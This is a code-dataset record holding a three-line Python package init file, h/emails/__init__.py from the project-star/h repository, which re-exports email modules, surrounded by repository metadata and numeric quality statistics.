| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
8a61fee32e82caa5ba15067a554201b0aab50824
| 117
|
py
|
Python
|
h/emails/__init__.py
|
project-star/h
|
fd1decafdce981b681ef3bd59e001b1284498dae
|
[
"MIT"
] | 1
|
2017-06-16T14:01:28.000Z
|
2017-06-16T14:01:28.000Z
|
h/emails/__init__.py
|
project-star/h
|
fd1decafdce981b681ef3bd59e001b1284498dae
|
[
"MIT"
] | null | null | null |
h/emails/__init__.py
|
project-star/h
|
fd1decafdce981b681ef3bd59e001b1284498dae
|
[
"MIT"
] | 1
|
2020-02-16T08:04:56.000Z
|
2020-02-16T08:04:56.000Z
|
# -*- coding: utf-8 -*-
from h.emails import reply_notification, signup
__all__ = ('reply_notification', 'signup')
| 19.5
| 47
| 0.700855
| 14
| 117
| 5.428571
| 0.785714
| 0.447368
| 0.605263
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.009901
| 0.136752
| 117
| 5
| 48
| 23.4
| 0.742574
| 0.179487
| 0
| 0
| 0
| 0
| 0.255319
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 5
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.